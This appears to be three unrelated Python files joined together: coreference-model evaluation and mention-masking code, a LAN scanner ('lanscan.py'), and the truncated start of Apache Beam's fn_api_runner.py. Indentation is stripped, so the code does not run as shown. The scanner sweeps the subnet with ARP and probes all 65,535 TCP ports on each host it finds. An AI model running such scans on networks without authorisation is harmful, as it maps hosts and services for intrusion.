def get_slow_antecedent_scores(self, top_span_emb, top_antecedents, top_antecedent_emb, top_antecedent_offsets, top_span_speaker_ids, genre_emb, segment_distance=None):
k = util.shape(top_span_emb, 0)
c = util.shape(top_antecedents, 1)
feature_emb_list = []
if self.config["use_metadata"]:
top_antecedent_speaker_ids = tf.gather(top_span_speaker_ids, top_antecedents) # [k, c]
same_speaker = tf.equal(tf.expand_dims(top_span_speaker_ids, 1), top_antecedent_speaker_ids) # [k, c]
speaker_pair_emb = tf.gather(tf.get_variable("same_speaker_emb", [2, self.config["feature_size"]]), tf.to_int32(same_speaker)) # [k, c, emb]
feature_emb_list.append(speaker_pair_emb)
tiled_genre_emb = tf.tile(tf.expand_dims(tf.expand_dims(genre_emb, 0), 0), [k, c, 1]) # [k, c, emb]
feature_emb_list.append(tiled_genre_emb)
if self.config["use_features"]:
antecedent_distance_buckets = self.bucket_distance(top_antecedent_offsets) # [k, c]
antecedent_distance_emb = tf.gather(tf.get_variable("antecedent_distance_emb", [10, self.config["feature_size"]]), antecedent_distance_buckets) # [k, c]
feature_emb_list.append(antecedent_distance_emb)
if segment_distance is not None:
with tf.variable_scope('segment_distance', reuse=tf.AUTO_REUSE):
segment_distance_emb = tf.gather(tf.get_variable("segment_distance_embeddings", [self.config['max_training_sentences'], self.config["feature_size"]]), segment_distance) # [k, emb]
span_width_emb = tf.nn.dropout(segment_distance_emb, self.dropout)
feature_emb_list.append(segment_distance_emb)
feature_emb = tf.concat(feature_emb_list, 2) # [k, c, emb]
feature_emb = tf.nn.dropout(feature_emb, self.dropout) # [k, c, emb]
target_emb = tf.expand_dims(top_span_emb, 1) # [k, 1, emb]
similarity_emb = top_antecedent_emb * target_emb # [k, c, emb]
target_emb = tf.tile(target_emb, [1, c, 1]) # [k, c, emb]
pair_emb = tf.concat([target_emb, top_antecedent_emb, similarity_emb, feature_emb], 2) # [k, c, emb]
with tf.variable_scope("slow_antecedent_scores"):
slow_antecedent_scores = util.ffnn(pair_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [k, c, 1]
slow_antecedent_scores = tf.squeeze(slow_antecedent_scores, 2) # [k, c]
return slow_antecedent_scores # [k, c]
def get_fast_antecedent_scores(self, top_span_emb):
with tf.variable_scope("src_projection"):
source_top_span_emb = tf.nn.dropout(util.projection(top_span_emb, util.shape(top_span_emb, -1)), self.dropout) # [k, emb]
target_top_span_emb = tf.nn.dropout(top_span_emb, self.dropout) # [k, emb]
return tf.matmul(source_top_span_emb, target_top_span_emb, transpose_b=True) # [k, k]
def flatten_emb_by_sentence(self, emb, text_len_mask):
num_sentences = tf.shape(emb)[0]
max_sentence_length = tf.shape(emb)[1]
emb_rank = len(emb.get_shape())
if emb_rank == 2:
flattened_emb = tf.reshape(emb, [num_sentences * max_sentence_length])
elif emb_rank == 3:
flattened_emb = tf.reshape(emb, [num_sentences * max_sentence_length, util.shape(emb, 2)])
else:
raise ValueError("Unsupported rank: {}".format(emb_rank))
return tf.boolean_mask(flattened_emb, tf.reshape(text_len_mask, [num_sentences * max_sentence_length]))
def get_predicted_antecedents(self, antecedents, antecedent_scores):
predicted_antecedents = []
for i, index in enumerate(np.argmax(antecedent_scores, axis=1) - 1):
if index < 0:
predicted_antecedents.append(-1)
else:
predicted_antecedents.append(antecedents[i, index])
return predicted_antecedents
def get_predicted_clusters(self, top_span_starts, top_span_ends, predicted_antecedents):
mention_to_predicted = {}
predicted_clusters = []
for i, predicted_index in enumerate(predicted_antecedents):
if predicted_index < 0:
continue
assert i > predicted_index, (i, predicted_index)
predicted_antecedent = (int(top_span_starts[predicted_index]), int(top_span_ends[predicted_index]))
if predicted_antecedent in mention_to_predicted:
predicted_cluster = mention_to_predicted[predicted_antecedent]
else:
predicted_cluster = len(predicted_clusters)
predicted_clusters.append([predicted_antecedent])
mention_to_predicted[predicted_antecedent] = predicted_cluster
mention = (int(top_span_starts[i]), int(top_span_ends[i]))
predicted_clusters[predicted_cluster].append(mention)
mention_to_predicted[mention] = predicted_cluster
predicted_clusters = [tuple(pc) for pc in predicted_clusters]
mention_to_predicted = { m:predicted_clusters[i] for m,i in mention_to_predicted.items() }
return predicted_clusters, mention_to_predicted
def get_mention_top_predicted_antecedents(self,top_span_starts, top_span_ends, predicted_antecedents, list_mentions):
"""
return a dictionary of mapping between
every mention in a defined list of mentions and its top predicted antecedent
list_mentions = defined list of mentions (e.g. masked mentions)
"""
mention_to_predicted_antecedent = {}
for i, predicted_index in enumerate(predicted_antecedents):
if predicted_index < 0:
continue
assert i > predicted_index, (i,predicted_index)
predicted_antecedent = (int(top_span_starts[predicted_index]), int(top_span_ends[predicted_index]))
mention = (int(top_span_starts[i]), int(top_span_ends[i]))
if mention in list_mentions:
mention_to_predicted_antecedent[mention] = predicted_antecedent
return mention_to_predicted_antecedent
def evaluate_antecedent(self, top_span_starts, top_span_ends, predicted_antecedents, gold_clusters, accuracy_evaluator, selected_mentions = None, evaluator_selected = None):
"""
to update antecedent evaluation and return scores (precision, recall, f1)
"""
gold_clusters = [tuple(tuple(m) for m in gc) for gc in gold_clusters]
mention_to_gold = {}
first_mentions = []
for gc in gold_clusters:
if len(gc) > 1:
first_mention = sorted(gc, key= lambda x: x[0])[0]
first_mentions.append(first_mention)
for mention in gc:
if mention != first_mention:
mention_to_gold[mention] = gc
mention_predicted_top_antecedents = self.get_mention_top_predicted_antecedents(top_span_starts, top_span_ends, predicted_antecedents, mention_to_gold.keys())
accuracy_evaluator.update(mention_predicted_top_antecedents, mention_to_gold)
if evaluator_selected != None:
mention_to_gold_selected = {m: mention_to_gold[m] for m in selected_mentions}
selected_mentions_predicted_top_antecedents = {m: mention_predicted_top_antecedents[m] for m in selected_mentions if m in mention_predicted_top_antecedents}
evaluator_selected.update(selected_mentions_predicted_top_antecedents, mention_to_gold_selected)
def evaluate_coref(self, top_span_starts, top_span_ends, predicted_antecedents, gold_clusters, evaluator, selected_mentions = None,
evaluator_selected = None):
'''
possible to evaluate on selected mentions
'''
gold_clusters = [tuple(tuple(m) for m in gc) for gc in gold_clusters]
mention_to_gold = {}
for gc in gold_clusters:
for mention in gc:
mention_to_gold[mention] = gc
predicted_clusters, mention_to_predicted = self.get_predicted_clusters(top_span_starts, top_span_ends, predicted_antecedents)
evaluator.update(predicted_clusters, gold_clusters, mention_to_predicted, mention_to_gold)
if selected_mentions != None:
evaluator_selected.update(predicted_clusters, gold_clusters, mention_to_predicted, mention_to_gold, selected_mentions = selected_mentions)
return predicted_clusters
def load_eval_data(self, masked = False):
'''
evaluation without masks or only on masks
'''
if masked:
eval_data = self.eval_data_masks
else:
eval_data = self.eval_data
if eval_data is None:
def load_line(line):
example = json.loads(line)
#If masked: mask one mention per cluster (but no more than a certain percentage overall)
if masked:
example = add_masks(example, skip_first_mention = True, n_masks_profile = 1, all_profiles = False,
mask_profile = 'one_per_cluster', n_placeholders = self.n_placeholders, perc_mask = 20)[0]
return self.tensorize_example(example, is_training=False), example
with open(self.config["eval_path"]) as f:
eval_data = [load_line(l) for l in f.readlines()]
if masked:
self.eval_data_masks = eval_data
else:
self.eval_data = eval_data
num_words = sum(tensorized_example[2].sum() for tensorized_example, _ in eval_data)
if not masked:
print("Loaded {} eval examples.".format(len(eval_data)))
else:
print("Loaded {} eval examples with masks.".format(len(eval_data)))
def evaluate(self, session, global_step=None, official_stdout=False, keys=None, eval_mode=False, masked = False, eval_on_masks_only = False, selected_mentions = None):
'''
evaluation on all mentions and a subset of them +
antecedent evaluation
'''
if masked:
self.eval_data_masks = None
self.load_eval_data(masked = masked)
coref_predictions = {}
coref_evaluator = metrics.CorefEvaluator()
antecedent_evaluator = metrics.CorefEvaluator_antecedent() # added to make an antecedent_evaluator, parallel to the original evaluator
if eval_on_masks_only:
antecedent_evaluator_selected = metrics.CorefEvaluator_antecedent()
else:
antecedent_evaluator_selected = None
losses = []
doc_keys = []
num_evaluated= 0
if masked:
eval_data = self.eval_data_masks
else:
eval_data = self.eval_data
for example_num, (tensorized_example, example) in enumerate(eval_data):
_, _, _, _, _, _, _, _, gold_starts, gold_ends, _, _ = tensorized_example
feed_dict = {i:t for i,t in zip(self.input_tensors, tensorized_example)}
print(num_evaluated)
print([i.shape for i in tensorized_example[:4]])
doc_keys.append(example['doc_key'])
loss, (candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends, top_antecedents, top_antecedent_scores) = session.run([self.loss, self.predictions], feed_dict=feed_dict)
losses.append(loss)
predicted_antecedents = self.get_predicted_antecedents(top_antecedents, top_antecedent_scores)
if eval_on_masks_only and masked:
selected_mentions = example['masked_mentions']
else:
selected_mentions = None
coref_predictions[example["doc_key"]] = self.evaluate_coref(top_span_starts, top_span_ends, predicted_antecedents, example["clusters"], coref_evaluator) #, selected_mentions = selected_mentions, evaluator_selected = coref_evaluator_selected)
gold_clusters = [tuple(tuple(m) for m in gc) for gc in example['clusters']]
# added to update the antecedent_evaluation
antecedent_evaluate_update = self.evaluate_antecedent(top_span_starts, top_span_ends, predicted_antecedents, example["clusters"], antecedent_evaluator, selected_mentions = selected_mentions, evaluator_selected = antecedent_evaluator_selected)
if example_num % 10 == 0:
print("Evaluated {}/{} examples.".format(example_num + 1, len(eval_data)))
summary_dict = {}
if eval_mode:
conll_results = conll.evaluate_conll(self.config["conll_eval_path"], coref_predictions, self.subtoken_maps, official_stdout )
average_f1 = sum(results["f"] for results in conll_results.values()) / len(conll_results)
summary_dict["Average F1 (conll)"] = average_f1
print("Average F1 (conll): {:.2f}%".format(average_f1))
p,r,f = coref_evaluator.get_prf()
summary_dict["Average F1 (py)"] = f
print("Average F1 (py): {:.2f}% on {} docs".format(f * 100, len(doc_keys)))
summary_dict["Average precision (py)"] = p
print("Average precision (py): {:.2f}%".format(p * 100))
summary_dict["Average recall (py)"] = r
print("Average recall (py): {:.2f}%".format(r * 100))
antecedent_p, antecedent_r, antecedent_f = antecedent_evaluator.get_prf()
summary_dict["Average antecedent_F1 (py)"] = antecedent_f
print("Average antecedent_F1 (py): {:.2f}% on {} docs".format(antecedent_f * 100, len(doc_keys)))
summary_dict["Average antecedent_precision (py)"] = antecedent_p
print("Average antecedent_precision (py): {:.2f}%".format(antecedent_p * 100))
summary_dict["Average antecedent_recall (py)"] = antecedent_r
print("Average antecedent_recall (py): {:.2f}%".format(antecedent_r * 100))
if eval_on_masks_only:
'''
p_masks, r_masks, f_masks = coref_evaluator_selected.get_prf()
summary_dict["Average masks F1 (py)"] = f_masks
print("Average masks F1 (py): {:.2f}% on {} docs".format(f_masks * 100, len(doc_keys)))
summary_dict["Average masks precision (py)"] = p_masks
print("Average masks precision (py): {:.2f}%".format(p_masks * 100))
summary_dict["Average masks recall (py)"] = r_masks
print("Average masks recall (py): {:.2f}%".format(r_masks * 100))
'''
antecedent_p_masks, antecedent_r_masks, antecedent_f_masks = antecedent_evaluator_selected.get_prf()
summary_dict["Average masks antecedent_F1 (py)"] = antecedent_f_masks
print("Average masks antecedent_F1 (py): {:.2f}% on {} docs".format(antecedent_f_masks * 100, len(doc_keys)))
summary_dict["Average masks antecedent_precision (py)"] = antecedent_p_masks
print("Average masks antecedent_precision (py): {:.2f}%".format(antecedent_p_masks * 100))
summary_dict["Average masks antecedent_recall (py)"] = antecedent_r_masks
print("Average masks antecedent_recall (py): {:.2f}%".format(antecedent_r_masks * 100))
return util.make_summary(summary_dict), f, antecedent_f, antecedent_f_masks
else:
return util.make_summary(summary_dict), f, antecedent_f
def mentions_to_consider(mentions):
'''
We don't mask mentions that are included in other mentions
'''
keep = []
i = 0
j = i + 1
while i < len(mentions) and j < len(mentions):
if mentions[i][1] < mentions[j][0]:
keep.append(mentions[i])
i = j
j += 1
if j == len(mentions):
keep.append(mentions[j -1 ])
break
else:
if mentions[i][1] < mentions[j][1]:
i = j
j += 1
else:
j += 1
return keep
def build_masks_profiles(candidate_mentions_to_mask, clusters,
all_profiles = False, mask_profile = 'percentage', perc_mask = 20, skip_first = False,
n_profiles = 5, n_masks_profile = 1, mentions_distance = 5, tokens_distance =50):
masked_mentions_profile = []
clusters_tmp = clusters.copy()
if skip_first:
clusters_tmp = [c for c in clusters_tmp if len(c) > 1]
for i in range(len(clusters_tmp)):
clusters_tmp[i] = sorted(clusters_tmp[i], key=lambda x: x[0])
j = 0
if skip_first:
while j < len(clusters_tmp[i]):
if clusters_tmp[i][j] in candidate_mentions_to_mask:
clusters_tmp[i] = clusters_tmp[i][j + 1:]
else:
j += 1
clusters_tmp[i] = [m for m in clusters_tmp[i] if m in candidate_mentions_to_mask]
if len(candidate_mentions_to_mask) > 0:
if mask_profile == 'percentage':
n_to_mask = int(round(len(candidate_mentions_to_mask) / 100 * perc_mask, 0))
if n_to_mask > len(candidate_mentions_to_mask):
n_to_mask = len(candidate_mentions_to_mask)
random.shuffle(candidate_mentions_to_mask)
if n_to_mask > 0:
while candidate_mentions_to_mask != []:
# mask a % of mentions in the textspan
masked_mentions = []
for _ in range(n_to_mask):
masked_mentions.append(candidate_mentions_to_mask.pop())
if candidate_mentions_to_mask == []:
break
masked_mentions = sorted(masked_mentions, key=lambda x: x[0])
masked_mentions_profile.append(masked_mentions)
if not all_profiles and len(masked_mentions_profile) == n_masks_profile:
break
elif mask_profile == 'one_per_cluster':
n_to_mask = int(round(len(candidate_mentions_to_mask) / 100 * perc_mask, 0))
random.shuffle(clusters_tmp)
for i in range(len(clusters_tmp)):
random.shuffle(clusters_tmp[i])
while candidate_mentions_to_mask != []:
masked_mentions = []
for i in range(len(clusters_tmp)):
if len(clusters_tmp[i]) > 0:
to_mask = clusters_tmp[i].pop()
masked_mentions.append(to_mask)
candidate_mentions_to_mask.remove(to_mask)
if len(masked_mentions) == n_to_mask:
break
masked_mentions = sorted(masked_mentions, key=lambda x: x[0])
masked_mentions_profile.append(masked_mentions)
if not all_profiles and len(masked_mentions_profile) == n_masks_profile:
break
elif mask_profile == 'n_profiles_random':
if len(candidate_mentions_to_mask) >= n_profiles:
random.shuffle(candidate_mentions_to_mask)
n = len(candidate_mentions_to_mask)//n_profiles
for i in range(n_profiles):
masked_mentions = []
if i == n_profiles -1 :
n += len(candidate_mentions_to_mask) % n_profiles
for _ in range(n):
masked_mentions.append(candidate_mentions_to_mask.pop())
if candidate_mentions_to_mask == []:
break
masked_mentions = sorted(masked_mentions, key=lambda x: x[0])
masked_mentions_profile.append(masked_mentions)
elif mask_profile == 'n_profiles_ordered':
if len(candidate_mentions_to_mask) >= n_profiles:
candidate_mentions_to_mask = sorted(candidate_mentions_to_mask, key=lambda x: x[0])
for i in range(n_profiles):
masked_mentions = []
j = i
while j < len(candidate_mentions_to_mask):
masked_mentions.append(candidate_mentions_to_mask[j])
j += n_profiles
masked_mentions = sorted(masked_mentions, key=lambda x: x[0])
masked_mentions_profile.append(masked_mentions)
elif mask_profile == 'len_profiles_random':
if n_masks_profile <= len(candidate_mentions_to_mask):
while candidate_mentions_to_mask != []:
# mask a % of mentions in the textspan
masked_mentions = []
for _ in range(n_masks_profile):
masked_mentions.append(candidate_mentions_to_mask.pop())
if candidate_mentions_to_mask == []:
break
masked_mentions = sorted(masked_mentions, key=lambda x: x[0])
masked_mentions_profile.append(masked_mentions)
if not all_profiles and len(masked_mentions_profile) == n_masks_profile:
break
elif mask_profile == 'len_profiles_ordered':
if n_masks_profile <= len(candidate_mentions_to_mask):
candidate_mentions_to_mask = sorted(candidate_mentions_to_mask, key=lambda x: x[0])
n = len(candidate_mentions_to_mask)//n_masks_profile + 1
i = 0
added = []
while sum([len(m) for m in masked_mentions_profile]) != len(candidate_mentions_to_mask):
masked_mentions = []
j = i
while j < len(candidate_mentions_to_mask):
if candidate_mentions_to_mask[j] not in added:
masked_mentions.append(candidate_mentions_to_mask[j])
added.append(candidate_mentions_to_mask[j])
j += n
masked_mentions = sorted(masked_mentions, key=lambda x: x[0])
masked_mentions_profile.append(masked_mentions)
i += 1
if not all_profiles and len(masked_mentions_profile) == n_masks_profile:
break
elif mask_profile == 'mentions_distance':
if n_masks_profile <= len(candidate_mentions_to_mask):
candidate_mentions_to_mask = sorted(candidate_mentions_to_mask, key=lambda x: x[0])
i = 0
added = []
while sum([len(m) for m in masked_mentions_profile]) != len(candidate_mentions_to_mask):
masked_mentions = []
j = i
while j < len(candidate_mentions_to_mask):
if candidate_mentions_to_mask[j] not in added:
masked_mentions.append(candidate_mentions_to_mask[j])
added.append(candidate_mentions_to_mask[j])
j += mentions_distance
masked_mentions = sorted(masked_mentions, key=lambda x: x[0])
masked_mentions_profile.append(masked_mentions)
i += 1
random.shuffle(masked_mentions_profile)
if not all_profiles:
masked_mentions_profile = masked_mentions_profile[:n_masks_profile]
elif mask_profile == 'tokens_distance':
candidate_mentions_to_mask = sorted(candidate_mentions_to_mask, key=lambda x: x[0])
i = 0
added = []
while sum([len(m) for m in masked_mentions_profile]) != len(candidate_mentions_to_mask):
masked_mentions = []
j = i
while j < len(candidate_mentions_to_mask):
if candidate_mentions_to_mask[j] not in added:
if not masked_mentions == []:
if candidate_mentions_to_mask[j][0] >= masked_mentions[-1][1] + tokens_distance:
masked_mentions.append(candidate_mentions_to_mask[j])
added.append(candidate_mentions_to_mask[j])
else:
masked_mentions.append(candidate_mentions_to_mask[j])
added.append(candidate_mentions_to_mask[j])
j += 1
masked_mentions = sorted(masked_mentions, key=lambda x: x[0])
masked_mentions_profile.append(masked_mentions)
i += 1
random.shuffle(masked_mentions_profile)
if not all_profiles:
masked_mentions_profile= masked_mentions_profile[:n_masks_profile]
elif mask_profile == 'one_per_cluster_tokens_distance':
n_to_mask = int(round(len(candidate_mentions_to_mask) / 100 * perc_mask, 0))
mention_to_cluster = {}
for c in clusters_tmp:
for m in c:
mention_to_cluster[tuple(m)] = c
candidate_mentions_to_mask = sorted(candidate_mentions_to_mask, key=lambda x: x[0])
i = 0
added = []
while sum([len(m) for m in masked_mentions_profile]) != len(candidate_mentions_to_mask):
masked_mentions = []
j = i
while j < len(candidate_mentions_to_mask):
if candidate_mentions_to_mask[j] not in added:
if not masked_mentions == []:
if candidate_mentions_to_mask[j][0] >= masked_mentions[-1][1] + tokens_distance:
same_cluster = False
for mask in masked_mentions:
if candidate_mentions_to_mask[j] in mention_to_cluster[tuple(mask)]:
same_cluster = True
break
if not same_cluster:
masked_mentions.append(candidate_mentions_to_mask[j])
added.append(candidate_mentions_to_mask[j])
else:
masked_mentions.append(candidate_mentions_to_mask[j])
added.append(candidate_mentions_to_mask[j])
if len(masked_mentions) == n_to_mask:
break
j += 1
masked_mentions = sorted(masked_mentions, key=lambda x: x[0])
masked_mentions_profile.append(masked_mentions)
i += 1
random.shuffle(masked_mentions_profile)
if not all_profiles:
masked_mentions_profile = masked_mentions_profile[:n_masks_profile]
if masked_mentions_profile == []:
masked_mentions_profile = [[]]
return masked_mentions_profile
def add_masks(t, perc_mask=20, mask_profile = 'percentage', max_to_mask = None, n_placeholders = 1,
all_profiles = False, skip_first_mention = True, tokens_distance = 30, n_masks_profile = 1):
# get boundaries of textspans and full text
text_span_all = []
boundaries_sentences = []
for i in range(len(t['sentences'])):
text_span = t['sentences'][i]
boundaries_sentences.append([len(text_span_all), len(text_span_all) + len(text_span)])
text_span_all += text_span
# collect all mentions
mentions = []
actual_mentions = {} # only for debugging
for cluster in t['clusters']:
for mention in cluster:
mention_start = mention[0]
mentions.append(mention)
# only for debugging
actual_mentions[str(mention)] = text_span_all[mention_start:mention[-1] + 1]
mentions = sorted(mentions, key=lambda x: x[0])
map_mentions_to_new_indices = {} # collect indices of mentions shifted after adding masks
candidate_mentions_to_mask = mentions_to_consider(
mentions) # keep only mentions that do not include other mentions
masked_mentions_profiles = build_masks_profiles(candidate_mentions_to_mask, t['clusters'],
all_profiles = all_profiles, mask_profile = mask_profile, perc_mask = perc_mask, skip_first = skip_first_mention,
tokens_distance = tokens_distance, n_masks_profile = n_masks_profile)
new_datapoints = []
for masked_mentions in masked_mentions_profiles:
if masked_mentions != []:
mask_mention_starts = [m[0] for m in masked_mentions]
else:
mask_mention_starts = []
actual_masked_mentions = [actual_mentions[str(m)] for m in masked_mentions]
token_index = 0
new_token_index = 0
prev_subtoken_index = 0 # used for subtoken map
count_subtokens = 0
mentions_covered = 0
idx_next_mention = 0
speakers_new_all = [] # eventually list of lists
sentences_new_all = [] # eventually list of lists
sentence_map_new = []
subtoken_map_new = []
pronouns_new = []
text_span_all_new = [] # for debugging
for textspan_idx in range(len(t['sentences'])):
text_span = t['sentences'][textspan_idx]
speakers = t['speakers'][textspan_idx]
text_span_new = []
speakers_new = []
boundaries_textspan = boundaries_sentences[textspan_idx] # boundaries of tokens spanned in the larger text
# find mentions in the textspan
mentions_textspan = []
while mentions_covered < len(mentions) and mentions[mentions_covered][1] <= boundaries_textspan[1]:
mentions_textspan.append(mentions[mentions_covered])
mentions_covered += 1
token_index_in_textspan = 0
while token_index_in_textspan < len(text_span) and token_index < len(
text_span_all): # while considering tokens in the textspan
subtoken_index = t['subtoken_map'][token_index]
if token_index in t['pronouns']:
pronouns_new.append(new_token_index)
masked = False
if idx_next_mention < len(mentions) and token_index == mentions[idx_next_mention][0]:
mention = mentions[idx_next_mention]
if mention[0] in mask_mention_starts and not mention in masked_mentions:
idx_next_mention += 1
continue
if mention in masked_mentions:
prev_subtoken_index = subtoken_index
count_subtokens += 1
text_span_new.append('[MASK]')
speakers_new.append(speakers[token_index_in_textspan])
sentence_map_new.append(t['sentence_map'][token_index])
subtoken_map_new.append(count_subtokens)
map_mentions_to_new_indices[str(mention)] = [new_token_index, new_token_index]
new_token_index += 1
masked = True
current_idx_mention = idx_next_mention
else:
map_mentions_to_new_indices[str(mention)] = [new_token_index,new_token_index + mention[1] - mention[0]]
idx_next_mention += 1
if idx_next_mention < len(mentions):
if not masked and token_index == mentions[idx_next_mention][0]:
continue
elif masked:
while mentions[idx_next_mention][1] <= mentions[current_idx_mention][1]:
idx_next_mention += 1
if not token_index in mask_mention_starts:
if subtoken_index != prev_subtoken_index:
count_subtokens += 1
prev_subtoken_index = subtoken_index
text_span_new.append(text_span[token_index_in_textspan])
speakers_new.append(speakers[token_index_in_textspan])
sentence_map_new.append(t['sentence_map'][token_index])
subtoken_map_new.append(count_subtokens)
new_token_index += 1
token_index += 1
token_index_in_textspan += 1
else:
token_index += mention[1] - mention[0] + 1
token_index_in_textspan += mention[1] - mention[0] + 1
sentences_new_all.append(text_span_new)
speakers_new_all.append(speakers_new)
text_span_all_new += text_span_new
clusters_new = []
for c in t['clusters']:
cluster = []
for m in c:
if str(m) in map_mentions_to_new_indices.keys():
cluster.append(map_mentions_to_new_indices[str(m)])
if cluster != []:
clusters_new.append(cluster)
t_new = t.copy()
try:
new_masked_mentions = [tuple(map_mentions_to_new_indices[str(m)]) for m in masked_mentions]
except:
print(masked_mentions, map_mentions_to_new_indices)
print(t)
t_new['masked_mentions'] = new_masked_mentions
t_new['masked_mentions_in_original'] = [tuple(m) for m in masked_mentions]
t_new['clusters'] = clusters_new
t_new['sentences'] = sentences_new_all
t_new['sentence_map'] = sentence_map_new
t_new['pronouns'] = pronouns_new
t_new['speakers'] = speakers_new_all
t_new['subtoken_map'] = subtoken_map_new
new_datapoints.append(t_new)
return new_datapoints
|
lanscan.py
|
import netifaces
from scapy.all import *
import socket
import netaddr
import ipaddress
from tqdm import tqdm
import socket
import os
import pandas as pd
import threading
def get_own_ip():
own_ip = netifaces.ifaddresses('en0')[netifaces.AF_INET][0]['addr']
return own_ip
def get_broadcastaddr():
broadcastaddr = netifaces.ifaddresses('en0')[netifaces.AF_INET][0]['broadcast']
return broadcastaddr
def get_netmask():
netmask = netifaces.ifaddresses('en0')[netifaces.AF_INET][0]['netmask']
return netmask
#ネットワークアドレス部を求める
# ホストアドレスが出てきてしまう→ネットワークアドレスを出したい
def get_networkaddr():
ip=get_own_ip()
netmask=get_netmask()
network_addr = str(netaddr.IPNetwork(ip+'/'+netmask).cidr)
return network_addr
#ホスト名を検索
def get_hostname(ip_list):
host_list=[]
for ip in ip_list:
try:
hostname = socket.gethostbyaddr(ip)[0]
host_list.append(hostname)
except:
host_list.append('None')
return host_list
def port_scan(ip_list):
for ip in tqdm(ip_list):
for port in tqdm(range(0,65535)):
individual_port=[]
s=socket.socket()
errno = s.connect_ex((ip,port))
s.close()
if errno == 0 :
individual_port.append(port)
port.append(individual_port)
def port_run(ip):
scan_range = [1, 65535];
host = ip
threads = [];
ports = [];
isopen = [];
individual_port=[]
def Run(port, i):
con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
return_code = con.connect_ex((host, port))
con.close()
if return_code == 0:
isopen[i]=1;
count = 0;
for port in tqdm(range(scan_range[0], scan_range[1])):
ports.append(port);
isopen.append(0);
thread = threading.Thread(target=Run, args=(port, count));
thread.start();
threads.append(thread);
count = count + 1;
for i in range(len(threads)):
threads[i].join()
if isopen[i] == 1:
individual_port.append(ports[i])
print('%d open' % ports[i])
print(individual_port)
return individual_port
# ipアドレス,macアドレス,host名,ポートを検索する
def get_hostinformation(networkaddr):
ip_list=[]
mac_list=[]
port=[]
for ip in tqdm(netaddr.IPNetwork(networkaddr)):
print(ip)
ip=str(ip)
frame = Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(op=1, pdst = ip)
receive = srp1(frame,timeout=0.1,iface='en0')
try:
mac_list.append(receive[Ether].src)
ip_list.append(ip)
print(receive)
except:
pass
host=get_hostname(ip_list)
for ip in tqdm(ip_list):
individual_port=port_run(ip)
port.append(individual_port)
return ip_list,mac_list,host,port
def make_result(ip,mac,host,port):
df=pd.DataFrame()
df['ip']=ip
df['mac']=mac
df['host']=host
df['port']=port
return df
if __name__ == '__main__':
own_ip=get_own_ip()
broadcastaddr = get_broadcastaddr()
netmask = get_netmask()
network_addr = get_networkaddr()
ip,mac,host,port=get_hostinformation(network_addr)
#print(f'ip:{ip}')
#print(f'mac:{mac}')
#print(f'hostname:{host}')
#print(f'port:{port}')
print('-------------------------------------------------------------------------------------------')
print(f'my_ip:{own_ip}')
print(f'broadcast_address:{broadcastaddr}')
print(f'netmask:{netmask}')
print(f'network_address:{network_addr}')
df=make_result(ip,mac,host,port)
print(df)
|
fn_api_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A PipelineRunner using the SDK harness.
"""
from __future__ import absolute_import
from __future__ import print_function
import collections
import contextlib
import copy
import itertools
import logging
import os
import queue
import subprocess
import sys
import threading
import time
import uuid
from builtins import object
import grpc
import apache_beam as beam # pylint: disable=ungrouped-imports
from apache_beam import coders
from apache_beam.coders.coder_impl import create_InputStream
from apache_beam.coders.coder_impl import create_OutputStream
from apache_beam.metrics import metric
from apache_beam.metrics import monitoring_infos
from apache_beam.metrics.execution import MetricResult
from apache_beam.options import pipeline_options
from apache_beam.options.value_provider import RuntimeValueProvider
from apache_beam.portability import common_urns
from apache_beam.portability import python_urns
from apache_beam.portability.api import beam_artifact_api_pb2
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_provision_api_pb2
from apache_beam.portability.api import beam_provision_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners import pipeline_context
from apache_beam.runners import runner
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability import fn_api_runner_transforms
from apache_beam.runners.portability import portable_metrics
from apache_beam.runners.portability.fn_api_runner_transforms import create_buffer_id
from apache_beam.runners.portability.fn_api_runner_transforms import only_element
from apache_beam.runners.portability.fn_api_runner_transforms import split_buffer_id
from apache_beam.runners.portability.fn_api_runner_transforms import unique_name
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker import sdk_worker
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.sdk_worker import _Future
from apache_beam.runners.worker.statecache import StateCache
from apache_beam.transforms import environments
from apache_beam.transforms import trigger
from apache_beam.transforms.window import GlobalWindow
from apache_beam.transforms.window import GlobalWindows
from apache_beam.utils import profiler
from apache_beam.utils import proto_utils
from apache_beam.utils import windowed_value
from apache_beam.utils.thread_pool_executor import UnboundedThreadPoolExecutor
# This module is experimental. No backwards-compatibility guarantees.
ENCODED_IMPULSE_VALUE = beam.coders.WindowedValueCoder(
beam.coders.BytesCoder(),
beam.coders.coders.GlobalWindowCoder()).get_impl().encode_nested(
beam.transforms.window.GlobalWindows.windowed_value(b''))
# State caching is enabled in the fn_api_runner for testing, except for one
# test which runs without state caching (FnApiRunnerTestWithDisabledCaching).
# The cache is disabled in production for other runners.
STATE_CACHE_SIZE = 100
_LOGGER = logging.getLogger(__name__)
class ControlConnection(object):
_uid_counter = 0
_lock = threading.Lock()
def __init__(self):
self._push_queue = queue.Queue()
self._input = None
self._futures_by_id = dict()
self._read_thread = threading.Thread(
name='beam_control_read', target=self._read)
self._state = BeamFnControlServicer.UNSTARTED_STATE
def _read(self):
for data in self._input:
self._futures_by_id.pop(data.instruction_id).set(data)
def push(self, req):
if req == BeamFnControlServicer._DONE_MARKER:
self._push_queue.put(req)
return None
if not req.instruction_id:
with ControlConnection._lock:
ControlConnection._uid_counter += 1
